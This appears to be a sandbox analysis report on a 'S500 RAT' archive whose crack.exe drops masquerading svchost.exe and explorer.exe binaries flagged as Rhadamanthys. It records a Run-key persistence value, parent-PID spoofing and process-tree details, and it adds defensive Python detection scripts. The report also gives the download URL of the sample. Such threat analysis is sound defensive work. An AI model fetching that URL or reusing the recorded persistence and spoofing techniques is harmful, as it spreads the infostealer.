Analysis Overview
Threat Level: Known bad
The submitted URL https://file.io/k3MVzAZvKJCU was found to be: Known bad. The URL was opened in Microsoft Edge, which downloaded S500 RAT.zip (see the NTFS ADS signature below); crack.exe from the extracted archive is the sample that ran.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Executes dropped EXE
UPX packed file
Loads dropped DLL
Adds Run key to start application
Detects Pyinstaller
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-04 15:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-04 15:47
Reported
2024-04-04 15:49
Platform
win11-20240221-en
Max time kernel
128s
Max time network
132s
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1616 created 2204 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\system32\sihost.exe |
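The row above records that PID 1616 (the dropped Temp\svchost.exe) created PID 2204 while naming sihost.exe as the new process's parent. Sysmon Event 1 and Security event 4688 only store the parent written into the new process's EPROCESS, which is the spoofed value; the ETW process-start event additionally carries the PID of the process that actually issued the call in its event header. The check below, an added example that is not part of this report, compares those two fields over a constructed event list. The PIDs 1616 and 2204, the creator image and the sihost.exe parent come from the row; the PID assigned to sihost.exe, the child image and the second (normal) creation are assumptions.

```python
"""Flag process creations whose recorded parent is not the process that
issued the create call (parent-PID spoofing)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessStart:
    # PID of the process that executed NtCreateUserProcess. Sysmon Event 1 and
    # Security 4688 do not record it; the ETW process-start event's header
    # ProcessId does (assumption: the collector keeps that header field).
    creator_pid: int
    creator_image: str
    # Parent stored in the new process's EPROCESS: what Sysmon/4688 call "parent".
    parent_pid: int
    parent_image: str
    new_pid: int
    new_image: str


def is_ppid_spoofed(ev: ProcessStart) -> bool:
    """Spoofing shows up as a creator that is not the recorded parent."""
    return ev.creator_pid != ev.parent_pid


def find_ppid_spoofing(events):
    return [ev for ev in events if is_ppid_spoofed(ev)]


def describe(ev: ProcessStart) -> str:
    return (f"PID {ev.creator_pid} ({ev.creator_image}) created PID {ev.new_pid} "
            f"({ev.new_image}) but recorded PID {ev.parent_pid} ({ev.parent_image}) "
            f"as its parent")


# Constructed sample. PIDs 1616 and 2204, the creator image and the sihost.exe
# parent come from the report row; sihost.exe's PID, the child's image and the
# second (normal) creation are assumptions made for this example.
SIHOST_PID = 3244
SAMPLE_EVENTS = [
    ProcessStart(1616, r"C:\Users\Admin\AppData\Local\Temp\svchost.exe",
                 SIHOST_PID, r"C:\Windows\system32\sihost.exe",
                 2204, "<child image not recorded in the report>"),
    ProcessStart(1616, r"C:\Users\Admin\AppData\Local\Temp\svchost.exe",
                 1616, r"C:\Users\Admin\AppData\Local\Temp\svchost.exe",
                 2300, r"C:\Users\Admin\AppData\Roaming\explorer.exe"),
]

if __name__ == "__main__":
    for ev in find_ppid_spoofing(SAMPLE_EVENTS):
        print(describe(ev))
```

With Sysmon-only telemetry the same creation would appear as sihost.exe spawning the child, so a process-tree view built from Sysmon alone hides the dropped svchost.exe as the real origin.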
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe (6 loads) | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe (8 loads) | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| 24 UPX-packed files detected; per-file details not included in this export | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| 12 events; routine browser UI activity, low signal on its own | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
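Two of the signatures above carry most of the signal: binaries named like Windows components (svchost.exe, explorer.exe) executing from %TEMP%, %APPDATA% and the user profile root, and a per-user Run value (Update64) that points at one of them. The script below is an added example, not part of this report, that applies both checks to the image paths and the Run-key indicator string quoted above. The allowlist of binary names and directories, and the rule that anything below C:\Users\ counts as user-writable, are assumptions for the example; the Run-key parser follows the sandbox's `key\name = "value"` indicator format exactly as printed in the table.

```python
"""Triage helpers for the 'Executes dropped EXE', 'SetWindowsHookEx' and
'Adds Run key' rows: flag system-binary names running from user-writable
directories and parse the Run-key indicator string."""
import ntpath
import re

# Image names that legitimately exist only under the Windows directory
# (assumption: a real allowlist would be generated from a clean build).
SYSTEM_BINARY_NAMES = {
    "svchost.exe", "explorer.exe", "sihost.exe", "dialer.exe",
    "taskkill.exe", "cmd.exe", "rundll32.exe", "powershell.exe",
}
# Directories those names are expected to be loaded from.
LEGITIMATE_DIRS = {
    r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64",
    r"c:\windows\system32\windowspowershell\v1.0",
    r"c:\windows\syswow64\windowspowershell\v1.0",
}


def is_masquerading(image_path: str) -> bool:
    """True when the basename is a Windows binary name but the directory is
    not one the binary ships in (e.g. %TEMP%\\svchost.exe)."""
    p = image_path.lower()
    return (ntpath.basename(p) in SYSTEM_BINARY_NAMES
            and ntpath.dirname(p) not in LEGITIMATE_DIRS)


def is_user_writable(path: str) -> bool:
    """Assumption: anything below C:\\Users\\ is writable by the logged-on
    user; on a live host check the ACL instead of the prefix."""
    return path.lower().startswith(r"c:\users" + "\\")


def triage_image_paths(paths):
    """Return the process image paths that masquerade as system binaries."""
    return [p for p in paths if is_masquerading(p)]


# Matches the sandbox's  key\name = "value"  indicator for Run/RunOnce entries.
RUN_INDICATOR = re.compile(
    r'^(?P<key>\\REGISTRY\\(?P<hive>USER|MACHINE)\\.*\\Run(?:Once)?)'
    r'\\(?P<name>[^\\]+) = "(?P<value>.*)"$'
)


def parse_run_indicator(indicator: str):
    """Parse one 'Adds Run key' indicator and note what makes it suspicious."""
    m = RUN_INDICATOR.match(indicator)
    if not m:
        return None
    # The report escapes backslashes inside the quoted value ("C:\\Users\\...").
    target = m.group("value").replace("\\\\", "\\")
    return {
        "hive": "HKU" if m.group("hive") == "USER" else "HKLM",
        "name": m.group("name"),
        "target": target,
        "user_writable_target": is_user_writable(target),
        "masquerading": is_masquerading(target),
    }


# Process image paths taken from the report, plus one legitimate explorer.exe
# path (constructed) to show the check stays quiet on it.
REPORT_IMAGE_PATHS = [
    r"C:\Users\Admin\AppData\Local\Temp\svchost.exe",
    r"C:\Users\Admin\AppData\Roaming\explorer.exe",
    r"C:\Users\Admin\explorer.exe",
    r"C:\Windows\SysWOW64\dialer.exe",
    r"C:\Windows\system32\taskkill.exe",
    r"C:\Windows\explorer.exe",
]

# The Run-key indicator exactly as it appears in the 'Adds Run key' table.
RUN_KEY_INDICATOR = (
    r'\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000'
    r'\Software\Microsoft\Windows\CurrentVersion\Run\Update64'
    r' = "C:\\Users\\Admin\\explorer.exe"'
)

if __name__ == "__main__":
    for p in triage_image_paths(REPORT_IMAGE_PATHS):
        print("masquerading:", p)
    print(parse_run_indicator(RUN_KEY_INDICATOR))
```

The same two predicates transfer directly to Sysmon Event 1 (Image) and Event 13 (TargetObject/Details) data; the only report-specific part is the indicator parser.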
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://file.io/k3MVzAZvKJCU
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd657e3cb8,0x7ffd657e3cc8,0x7ffd657e3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
